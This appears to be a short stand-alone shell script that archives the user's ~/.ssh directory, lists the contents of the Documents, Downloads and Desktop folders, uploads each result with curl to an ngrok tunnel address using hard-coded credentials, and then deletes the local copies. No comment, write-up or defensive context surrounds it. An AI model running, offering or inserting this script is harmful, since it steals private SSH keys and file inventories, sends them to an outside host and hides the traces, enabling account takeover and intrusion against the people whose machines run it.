cd ~
tar -cvf `whoami`-`hostname`-ssh.tar .ssh
filename=`whoami`-`hostname`-ssh.tar
curl -F "uploadfile=@$filename" -u user:test123 https://16065128d4f6.ngrok.io/
find ~/Documents > `whoami`-documents.txt
filename=`whoami`-documents.txt
curl -F "uploadfile=@$filename" -u user:test123 https://16065128d4f6.ngrok.io/
find ~/Downloads > `whoami`-downloads.txt
filename=`whoami`-downloads.txt
curl -F "uploadfile=@$filename" -u user:test123 https://16065128d4f6.ngrok.io/
find ~/Desktop > `whoami`-desktop.txt
filename=`whoami`-desktop.txt
curl -F "uploadfile=@$filename" -u user:test123 https://16065128d4f6.ngrok.io/
rm -rf `whoami`-`hostname`-ssh.tar
rm -rf `whoami`-documents.txt
rm -rf `whoami`-downloads.txt
rm -rf `whoami`-desktop.txt
